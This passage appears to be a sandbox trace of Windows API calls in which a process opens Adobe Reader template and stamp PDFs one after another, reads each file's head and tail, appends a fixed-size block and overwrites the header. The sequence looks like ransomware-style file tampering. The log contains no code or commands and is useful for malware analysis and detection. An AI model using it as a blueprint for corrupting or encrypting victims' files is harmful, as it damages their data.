lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.656] ReadFile (in: hFile=0x1bc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0062.664] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xff09 [0062.665] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.709] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xff09 [0062.709] WriteFile (in: hFile=0x1bc, lpBuffer=0x269dc48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x269dc48*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.710] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.710] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.711] CloseHandle (hObject=0x1bc) returned 1 [0062.753] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.753] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.753] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5aac [0062.754] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.754] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.754] ReleaseMutex (hMutex=0x168) returned 1 [0062.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f734cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.754] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.768] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4aac [0062.768] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.769] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4aac [0062.770] WriteFile (in: hFile=0x1bc, lpBuffer=0x2697c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2697c18*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.771] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.771] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ec5568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0062.771] CloseHandle (hObject=0x1bc) returned 1 [0062.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0062.774] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.774] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x48d20 [0062.775] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0062.776] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.776] ReleaseMutex (hMutex=0x168) returned 1 [0062.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DefaultID.pdf", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefaultID.pdf", lpUsedDefaultChar=0x0) returned 13 [0062.776] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0062.801] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x47d20 [0062.801] ReadFile (in: hFile=0x1bc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0062.902] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x47d20 [0062.902] WriteFile (in: hFile=0x1bc, lpBuffer=0x269e578*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x269e578*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.903] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0062.903] WriteFile (in: hFile=0x1bc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0062.903] CloseHandle (hObject=0x1bc) returned 1 [0063.887] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0063.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0063.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x13e0e [0063.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0063.933] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.934] ReleaseMutex (hMutex=0x168) returned 1 [0063.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0063.934] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0063.957] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x12e0e [0063.957] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x269c448*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0063.970] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x12e0e [0063.970] WriteFile (in: hFile=0x1cc, lpBuffer=0x269e4a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x269e4a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.973] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0063.973] WriteFile (in: hFile=0x1cc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.973] CloseHandle (hObject=0x1cc) returned 1 [0063.991] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0063.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0063.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7d00 [0063.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0063.991] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.992] ReleaseMutex (hMutex=0x168) returned 1 [0063.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0063.992] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6d00 [0064.012] ReadFile (in: hFile=0x1cc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6d00 [0064.021] WriteFile (in: hFile=0x1cc, lpBuffer=0x269c448*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x269c448*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.022] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.022] WriteFile (in: hFile=0x1cc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0064.022] CloseHandle (hObject=0x1cc) returned 1 [0064.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18757 [0064.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.037] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.037] ReleaseMutex (hMutex=0x168) returned 1 [0064.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.037] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0064.066] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17757 [0064.066] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17757 [0064.086] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.086] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.086] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.086] CloseHandle (hObject=0x1cc) returned 1 [0064.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.095] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.095] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8c96 [0064.095] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.095] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.095] ReleaseMutex (hMutex=0x168) returned 1 [0064.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f734ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.095] ReadFile (in: hFile=0x1cc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0064.101] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7c96 [0064.101] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.111] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7c96 [0064.111] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.112] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.112] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.112] CloseHandle (hObject=0x1cc) returned 1 [0064.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0064.410] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x30eb7 [0064.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0064.411] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.566] ReleaseMutex (hMutex=0x168) returned 1 [0064.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.567] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0064.571] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2feb7 [0064.572] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0064.580] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2feb7 [0064.581] WriteFile (in: hFile=0x1cc, lpBuffer=0x2664a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2664a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.582] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0064.582] WriteFile (in: hFile=0x1cc, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0064.582] CloseHandle (hObject=0x1cc) returned 1 [0064.929] CreateFileW 